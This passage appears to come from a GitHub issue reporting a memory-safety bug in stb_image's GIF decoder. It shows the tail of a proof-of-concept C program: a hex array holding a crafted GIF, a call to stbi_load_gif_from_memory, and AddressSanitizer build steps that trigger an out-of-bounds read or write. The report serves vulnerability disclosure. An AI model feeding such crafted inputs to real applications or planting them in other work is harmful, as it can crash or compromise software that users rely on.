        0xef, 0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 
        0xff, 0x00, 0x03, 0x0a, 0x1c, 0x48, 0xb0, 0xa0, 0xc1, 0x83, 0xee, 0xa0, 0x81, 0x08, 0x02, 0x00, 
        0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 
        0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 
        0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 
        0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x05, 0x00, 0x02, 0x00, 0x47, 0x00, 0x41, 
        0x00, 0x00, 0x06, 0xff, 0x40, 0x90, 0x70, 0x48, 0x2c, 0x1a, 0x8f, 0x42, 0x80, 0x72, 0xb9, 0x44, 
        0x3a, 0x9f, 0xd0, 0x28, 0x92, 0xa9, 0x14, 0x58, 0xaf, 0xd7, 0xa6, 0x74, 0xcb, 0x9d, 0x2e, 0x03, 
        0x04, 0x0a, 0x06, 0xa3, 0x29, 0x9b, 0xcb, 0x98, 0x86, 0x61, 0x10, 0x00, 0x74, 0xdf, 0x52, 0xe6, 
        0x00, 0x81, 0xe9, 0x6c, 0x3b, 0x14, 0x83, 0xc0, 0x0d, 0xef, 0x17, 0xbf, 0x08, 0x1a, 0x7e, 0x1a, 
        0x0b, 0x03, 0x7e, 0x87, 0x4b, 0x02, 0x14, 0x87, 0x43, 0x1d, 0x08, 0x02, 0x8c, 0x5d, 0x4b, 0x03, 
        0x18, 0x91, 0x43, 0x1f, 0x18, 0x90, 0x96, 0x50, 0x4b, 0x06, 0x95, 0x40, 0x80, 0x70, 0x48, 0x2c, 
        0x1a, 0x8f, 0x46, 0x81, 0x72, 0xb9, 0x44, 0x3a, 0x9f, 0xd0, 0xe8, 0x51, 0x60, 0x40, 0x50, 0x34, 
        0xd8, 0x6c, 0x96, 0x82, 0x20, 0x08, 0xa4, 0xe0, 0x30, 0x32, 0x40, 0x68, 0x60, 0x3e, 0xe8, 0xb4, 
        0x5a, 0xed, 0xc1, 0x20, 0xbe, 0xe2, 0x78, 0x74, 0x80, 0xc0, 0x78, 0xd6, 0xf8, 0xfc, 0x07, 0x63, 
        0x08, 0xc8, 0xff, 0x45, 0x02, 0x08, 0x1a, 0x7a, 0x85, 0x78, 0x1e, 0x14, 0x03, 0x80, 0x80, 0x04, 
        0x67, 0x86, 0x8f, 0x6b, 0x1a, 0x7d, 0x8b, 0x61, 0x01, 0x08, 0x1d, 0x90, 0x99, 0x6c, 0xfe, 0x45, 
        0x05, 0x7f, 0x45, 0x10, 0x77, 0x21, 0x03, 0x44, 0xc0, 0x5f, 0x01, 0x0c, 0xf4, 0xa2, 0x41, 0x58, 
        0x85, 0xcc, 0x2a, 0xf5, 0x18, 0xa0, 0xe7, 0xe5, 0xd7, 0x03, 0x9c, 0xaf, 0x61, 0xbf, 0x00, 0x5e, 
        0xa7, 0x1f, 0x50, 0x01, 0x31, 0x66, 0x54, 0xde, 0x2e, 0xa7, 0x1e, 0xfc, 0x88, 0x79, 0x5e, 0x0c, 
        0x40, 0x68, 0x73, 0x71, 0xbf, 0x9d, 0x5e, 0x2c, 0x05, 0x71, 0x60, 0x80, 0xc0, 0x14, 0xf5, 0x22, 
        0x80, 0x88, 0x5d, 0x78, 0xe1, 0x2e, 0x99, 0x02, 0x8a, 0x67, 0xb1, 0x80, 0xf2, 0x93, 0x65, 0x5e, 
        0xa2, 0x07, 0x18, 0x2c, 0x40, 0x00, 0x1a, 0x7b, 0xbc, 0xe1, 0x45, 0x07, 0xb1, 0x57, 0xaf, 0xfc, 
        0x01, 0x3d, 0xab, 0x81, 0xc0, 0x79, 0x05, 0xe0, 0xc5, 0x40, 0x05, 0x3b, 0x82, 0x5d, 0x06, 0x05, 
        0xf8, 0xe3, 0x8f, 0x01, 0x06, 0x7e, 0xfc, 0x78, 0x57, 0xf5, 0xd6, 0xeb, 0x5e, 0xf6, 0x40, 0x91, 
        0x1b, 0xe8, 0x00, 0xb0, 0x7a, 0xc5, 0x63, 0xde, 0xfd, 0x6a, 0x51, 0x17, 0xe7, 0x0c, 0x0f, 0x80, 
        0xdc, 0x53, 0xc0, 0x02, 0x7c, 0x07, 0xb1, 0xbb, 0x70, 0x0f, 0x3d, 0x07, 0x44, 0x60, 0x04, 0x1a, 
        0x71, 0x37, 0x03, 0x3c, 0x20, 0x02, 0x0f, 0xc4, 0xdd, 0xfa, 0x8a, 0x37, 0xba, 0x42, 0x14, 0x6d, 
        0x01, 0x20, 0x94, 0x5d, 0x5e, 0x32, 0xc8, 0x00, 0x06, 0xc0, 0x2a, 0x59, 0x03, 0x68, 0xc2, 0x07, 
        0x5b, 0xc8, 0xc2, 0x07, 0x20, 0x20, 0x56, 0x83, 0x63, 0x82, 0x13, 0x16, 0x20, 0xac, 0x1e, 0x3a, 
        0xc1, 0x00, 0xd0, 0x03, 0x85, 0xd7, 0x60, 0x42, 0x44, 0x60, 0xac, 0x21, 0x08, 0x00, 0x21, 0xf9, 
        0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 
        0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 
        0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 
        0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 
        0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 
        0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 
        0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 
        0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 
        0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x3b, 0x0a
    };

    unsigned char *img = stbi_load_gif_from_memory(data, sizeof(data), &delays, &width, &height, &frames, &comp, 0);

    if (img != NULL) {
        printf("Loaded GIF: %dx%d, %d frames, %d components\n", width, height, frames, comp);
        stbi_image_free(img);
    } else {
        printf("Failed to load GIF from memory.\n");
    }

    if (delays != NULL) {
        STBI_FREE(delays);
    }

    return 0;
}
  1. Compile a test application with AddressSanitizer enabled: 
    clang poc.c -o poc -g3 -fsanitize=address,undefined -I. -DSTB_IMAGE_IMPLEMENTATION -fno-omit-frame-pointer
  2. Execute the application, then the data in the code will trigger the out-of-bounds memory access.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@jsnv-dev